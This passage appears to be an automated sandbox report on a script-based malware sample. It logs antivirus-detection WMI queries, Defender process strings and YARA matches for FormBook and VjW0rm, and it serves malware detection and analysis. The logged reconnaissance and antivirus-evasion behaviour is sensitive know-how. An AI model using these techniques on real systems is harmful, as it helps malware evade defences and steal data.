Source: explorer.exe, 00000004.00000000.354116573.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.418645312.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.294537986.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710419967.000001B745425000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.554212669.000001B74541F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ows Defender\MsMpeng.exe
Source: wscript.exe, 00000001.00000002.823061632.000001B745406000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.786905329.000001B742D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.710856543.000001B742E29000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED
Yara detected VjW0rm
Source: Yara match File source: 0000000C.00000002.799354104.0000010D37867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787481597.000001B744A45000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.352632654.0000023E30CBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.787143262.000001B742DEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788512933.0000023E2EF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.799045100.0000010D35F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309422158.000001A547DDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787235102.000001A5460F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.787256308.000001A5460FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.790309780.0000023E30CBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.280726639.000001B744A4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.788030615.000001A547DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 7112, type: MEMORYSTR
